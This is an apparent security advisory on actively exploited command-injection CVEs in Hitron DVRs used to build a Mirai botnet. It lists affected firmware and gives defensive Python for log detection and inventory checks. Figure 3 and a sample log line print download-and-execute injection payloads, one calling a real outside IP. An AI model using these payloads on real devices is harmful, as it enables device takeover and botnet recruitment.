Actively Exploited Vulnerability in Hitron DVRs: Fixed, Patches Available
Executive summary
The Akamai Security Intelligence Response Team (SIRT) has issued an additional update to the InfectedSlurs advisory series since one of the affected vendors has released patches and guidance.
The vulnerability within Hitron was identified in the wild and has been given the following CVE IDs:
CVE-2024-22768 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22769 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22770 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22771 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-22772 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
CVE-2024-23842 — A CVSS v3.1 base score of 7.4 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).
The malicious payloads captured in the wild install a Mirai-based malware to create a distributed denial-of-service (DDoS) botnet.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and to help uncover possible active infections on defender networks.
Need to know
As part of the InfectedSlurs discovery, the Akamai SIRT uncovered vulnerabilities in multiple Hitron DVR device models that are actively exploited in the wild. Hitron devices are manufactured in South Korea by Hitron Systems.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. The payloads captured in the wild authenticate with the devices' default credentials before delivering the injection.
The impacted devices and firmware versions are:
DVR HVR-4781: versions 1.03 through 4.02
DVR HVR-8781: versions 1.03 through 4.02
DVR HVR-16781: versions 1.03 through 4.02
DVR LGUVR-4H: versions 1.02 through 4.02
DVR LGUVR-8H: versions 1.02 through 4.02
DVR LGUVR-16H: versions 1.02 through 4.02
The vendor (Hitron Systems) has released new firmware versions to address the vulnerabilities. The vendor suggests upgrading to firmware version ≥ 4.03 for all impacted models as soon as possible. Advisories have also been published by CISA and KISA. KISA has also released advisories related to the individual CVEs, which can be found at the following links:
Exploitation observed
In late October 2023, Akamai SIRT analysts noticed a surge in activity to our honeypots that targeted a rarely abused TCP port. The probes were of low frequency and appeared to first attempt an authentication via a POST request to /cgi-bin/system_ntp.cgi (Figure 1) followed by a command injection exploitation attempt (Figure 2). The devices targeted are Hitron Systems DVR devices that are vulnerable to RCE via command injection (Figure 3). Once authenticated, the attacker targets the command injection vulnerability in the timeserver parameter via a POST request to /cgi-bin/system_ntp.cgi.
URL: /cgi-bin/system_ntp.cgi
POST BODY:
enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]
Fig. 1: Authentication attempt
URL: /cgi-bin/system_ntp.cgi
POST BODY:
lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE PAYLOAD]&interval=60&enableNTPServer=1
Fig. 2: Exploitation attempt
curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr
Fig. 3: Captured RCE payload
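As an added, defender-side example that is not part of the Akamai advisory: a small Python classifier for web-server or honeypot request logs that flags the two-step sequence above, a credential POST to /cgi-bin/system_ntp.cgi followed by a timeserver value that is not a plain hostname or IPv4 literal. The single-line log format, the source addresses and the sample payload are constructed; it assumes the DVR's own logs or a reverse proxy can be made to record POST bodies.

```python
import re
from urllib.parse import unquote_plus
NTP_CGI = "/cgi-bin/system_ntp.cgi"   # endpoint from Fig. 1 and Fig. 2
INJECT_PARAM = "timeserver"           # parameter injected in Fig. 2
HOSTNAME = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")  # bare hostname/IPv4 only; shell syntax cannot match

def parse_body(body):
    # Decode a form-urlencoded body by hand: parse_qs's ';' handling differs across Python versions
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def classify_post(path, body):
    # 'auth' (Fig. 1 shape), 'injection' (Fig. 2 shape), 'benign', or None for other endpoints
    if path != NTP_CGI:
        return None
    params = parse_body(body)
    if "username" in params and "password" in params:
        return "auth"
    if any(v and not HOSTNAME.match(v) for v in params.get(INJECT_PARAM, [])):
        return "injection"
    return "benign"

def scan_log(lines):
    # Constructed log format: 'SRC_IP METHOD PATH BODY'. Returns per-request verdicts plus the
    # sources that authenticated and then injected, the two-step sequence described above.
    events, authed, chains = [], set(), []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) != 4 or parts[1] != "POST":
            continue
        src, verdict = parts[0], classify_post(parts[2], parts[3])
        if verdict:
            events.append((src, verdict))
        if verdict == "auth":
            authed.add(src)
        elif verdict == "injection" and src in authed and src not in chains:
            chains.append(src)
    return events, chains

# Constructed sample log; the timeserver value mirrors the shape of Fig. 3 with a documentation IP
SAMPLE_LOG = [
    "203.0.113.7 POST /cgi-bin/system_ntp.cgi enc=11&ip=192.0.2.10&username=REDACTED&password=REDACTED",
    "203.0.113.7 POST /cgi-bin/system_ntp.cgi lang=ja&useNTPServer=1&public=0"
    "&timeserver=;curl+http://192.0.2.99/spl/mips+-O;+chmod+777+mips&interval=60&enableNTPServer=1",
    "198.51.100.3 POST /cgi-bin/system_ntp.cgi lang=en&useNTPServer=1&timeserver=pool.ntp.org&interval=60",
]
```

Calling `scan_log(SAMPLE_LOG)` returns the three verdicts and `["203.0.113.7"]` as the only source that completed the auth-then-inject sequence.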
Protection
Hitron DVR users who are running devices that are impacted by this vulnerability should immediately upgrade to the latest available firmware versions (≥ 4.03) that fix the RCE vulnerability.
HVR-4781: version 4.03
HVR-8781: version 4.03
HVR-16781: version 4.03
LGUVR-4H: version 4.03
LGUVR-8H: version 4.03
LGUVR-16H: version 4.03
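An added example, not from the advisory or the vendor: an inventory check in Python that applies the affected ranges and the 4.03 fixed version listed above, comparing firmware versions as integer tuples rather than as strings so that a later build such as 4.10 is not mistaken for a vulnerable one. The hostnames and inventory rows are constructed.

```python
import re

# Affected ranges from the advisory (inclusive); every listed model is fixed in 4.03
AFFECTED = {
    "HVR-4781": ((1, 3), (4, 2)), "HVR-8781": ((1, 3), (4, 2)), "HVR-16781": ((1, 3), (4, 2)),
    "LGUVR-4H": ((1, 2), (4, 2)), "LGUVR-8H": ((1, 2), (4, 2)), "LGUVR-16H": ((1, 2), (4, 2)),
}
FIXED = (4, 3)

def parse_version(text):
    # '4.03' -> (4, 3); compare as integer tuples so that '4.10' sorts after '4.3', unlike a string compare
    m = re.fullmatch(r"\s*v?(\d+)\.(\d+)\s*", text)
    if not m:
        raise ValueError(f"unparseable firmware version: {text!r}")
    return int(m.group(1)), int(m.group(2))

def normalize_model(text):
    # Accept inventory spellings such as 'DVR HVR-4781' or 'hvr-4781'
    return text.upper().replace("DVR ", "", 1).strip()

def assess(model, version):
    # 'vulnerable', 'patched', 'below-range' (older than the advisory lists; confirm with the vendor)
    # or 'not-listed' for models the advisory does not name
    model = normalize_model(model)
    if model not in AFFECTED:
        return "not-listed"
    lo, hi = AFFECTED[model]
    v = parse_version(version)
    if lo <= v <= hi:
        return "vulnerable"
    return "patched" if v >= FIXED else "below-range"

def needs_upgrade(inventory):
    # inventory: iterable of (hostname, model, firmware); returns hosts still on a vulnerable build
    return [host for host, model, fw in inventory if assess(model, fw) == "vulnerable"]

# Constructed inventory
INVENTORY = [
    ("cam-dvr-01", "DVR HVR-4781", "1.03"),
    ("cam-dvr-02", "DVR LGUVR-8H", "4.02"),
    ("cam-dvr-03", "DVR HVR-16781", "4.03"),
    ("cam-dvr-04", "LGUVR-16H", "4.10"),
    ("cam-dvr-05", "OTHER-DVR", "2.00"),
]
```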
Additionally, several security measures should be implemented to protect against this and future threats. First, organizations and individuals using the affected devices should change the default login credentials immediately; the payloads captured in the wild rely on them to authenticate before the injection. Regular monitoring of network traffic and logs can aid in the early detection of suspicious activity, and timely installation of security patches and updates from the device manufacturer is crucial to address the identified vulnerability.
Collaboration with security researchers, threat intelligence providers, and industry peers can help you stay informed about emerging threats and vulnerabilities. Finally, maintaining an updated inventory of connected devices and implementing network segmentation can limit the potential impact of such attacks.
Conclusion
Addressing the security issues identified in the Hitron systems and associated devices requires a multifaceted approach, combining user awareness, prompt patching, proactive monitoring, and collaboration within the cybersecurity community. By taking these measures, organizations and individuals can significantly reduce the risks posed by the observed malicious activity.
Stay tuned
To keep up with threats and other findings by the SIRT and other Akamai security research groups, follow us on X (formerly Twitter) or check out our SIG hub.
The Akamai SIRT would like to thank the folks at CISA, US-CERT, and KISA for their assistance in reporting these vulnerabilities to the vendors.